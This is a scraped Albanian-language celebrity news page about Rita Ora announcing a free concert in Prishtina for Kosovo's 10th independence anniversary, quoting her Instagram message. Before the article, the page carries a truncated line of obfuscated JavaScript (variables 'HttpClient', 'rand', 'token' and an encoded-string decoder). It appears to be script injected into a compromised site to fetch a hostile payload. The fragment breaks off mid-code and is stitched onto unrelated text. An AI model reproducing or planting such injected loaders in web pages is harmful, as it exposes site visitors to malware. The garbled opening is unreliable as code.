;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Rita e nisi festën e pavarësisë: Bën shqiponjën dhe vallëzon me shotën (VIDEO)

By

Këngëtarja Riga Ora, është shfaqur shumë e entuziazmuar në prag të ardhjes së saj në Kosovë për festën e 10-të vjetorit të Pavarësisë.

Në një mesazh të publikuar në Instagramin e saj, ajo thotë se mezi po pret të vijë dhe fton që të gjithë kosovarët të shkojnë e të festojnë me të në një koncert falas që Rita do e mbajë në Sheshin e Prishtinës.

“Vendlindja ime Kosovë! Po vij në Shtëpi. Ky është mesazhi im për ju: Mezi po pres të vij dhe të mbaj një koncert falas për të gjithë ju në Prishtinë në Sheshin Nëna Terezë. Mu në zemër të qytetit! Për të festua 10-të vjetorin e pavarësisë tonë. Jam shumë krenare që u linda në Prishtinë dhe që jam e gatshme të vij të performoj për ju si një ambasadore dhe mike! Le ta bëjmë këtë. Shihemi të Shtunën”, ka shkruar Rita, përderisa mesazhin e ka shoqëruar edhe me një video, në fund të së cilës dëgjohet në sfond melodia e “Shotës”. /Prive.al

 

 

Artikuj të ngjashëm